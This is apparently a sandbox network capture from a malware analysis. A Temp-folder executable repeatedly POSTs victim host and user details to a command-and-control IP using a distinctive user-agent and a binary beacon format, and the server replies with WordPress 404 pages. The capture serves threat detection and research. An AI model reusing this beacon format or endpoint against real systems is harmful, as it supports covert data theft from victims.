Jul 4, 2024 08:23:52.422955990 CEST	448	IN	Data Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61 Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
Jul 4, 2024 08:23:52.424468994 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:52.424552917 CEST	224	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1
Jul 4, 2024 08:23:52.424614906 CEST	1236	IN	Data Raw: 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 Data Ascii: .25em 2.375em}</style><style id='classic-theme-styles-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;paddin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49760	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:52.576198101 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:52.581032038 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:55.512862921 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:53 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:55.512877941 CEST	224	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.wi
Jul 4, 2024 08:23:55.512897015 CEST	1236	IN	Data Raw: 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e Data Ascii: dth,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canv
Jul 4, 2024 08:23:55.512928963 CEST	1236	IN	Data Raw: 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 Data Ascii: tingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.ge
Jul 4, 2024 08:23:55.512939930 CEST	1236	IN	Data Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 Data Ascii: ion(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</scrip
Jul 4, 2024 08:23:55.512957096 CEST	672	IN	Data Raw: 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 Data Ascii: ffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-them
Jul 4, 2024 08:23:55.512974024 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:55.513226986 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:23:55.513237953 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:23:55.513300896 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49761	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:55.668996096 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:55.674304962 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:59.484910011 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:56 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:59.484932899 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:59.484939098 CEST	448	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:59.484946012 CEST	1236	IN	Data Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
Jul 4, 2024 08:23:59.484952927 CEST	1236	IN	Data Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
Jul 4, 2024 08:23:59.484965086 CEST	1236	IN	Data Raw: 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61 Data Ascii: enter}.is-dark-theme .wp-block-image figcaption{color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquot
Jul 4, 2024 08:23:59.484972000 CEST	1236	IN	Data Raw: 2e 69 73 2d 73 74 79 6c 65 2d 77 69 64 65 29 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 77 69 64 74 68 3a 31 30 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: .is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0
Jul 4, 2024 08:23:59.484978914 CEST	896	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d Data Ascii: --wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset-
Jul 4, 2024 08:23:59.485121012 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:23:59.485186100 CEST	224	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49762	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:59.644125938 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:59.648968935 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:24:02.586976051 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:24:00 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:24:02.587033033 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:24:02.587047100 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:24:02.587205887 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
